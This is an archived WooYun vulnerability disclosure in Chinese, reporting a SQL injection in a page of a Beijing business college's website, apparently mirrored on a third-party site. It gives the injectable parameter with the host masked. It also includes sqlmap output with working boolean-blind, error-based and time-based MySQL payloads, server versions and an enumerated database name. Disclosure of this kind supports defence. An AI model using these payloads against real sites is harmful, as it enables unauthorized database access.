乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-12: 细节已通知厂商并且等待厂商处理中 2016-01-17: 厂商已经主动忽略漏洞,细节向公众公开
北京国际商务学院SQL注入
注入点:http://**.**.**.**/ibub/liuxue/?menuid=13&mainid=1&elsetype=6
sqlmap resumed the following injection point(s) from stored session:---Parameter: menuid (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: menuid=13 RLIKE (SELECT (CASE WHEN (3689=3689) THEN 13 ELSE 0x28 END))&mainid=1&elsetype=6 Type: error-based Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: menuid=13 PROCEDURE ANALYSE(EXTRACTVALUE(8869,CONCAT(0x5c,0x717a6a7871,(SELECT (CASE WHEN (8869=8869) THEN 1 ELSE 0 END)),0x717a767871)),1)&mainid=1&elsetype=6 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: menuid=13 AND SLEEP(5)&mainid=1&elsetype=6---web application technology: Apache 2.2.9, PHP 5.2.14back-end DBMS: MySQL 5.1available databases [1]:[*] ibub_cc_fuckdb
危害等级:无影响厂商忽略
忽略时间:2016-01-17 22:34
暂无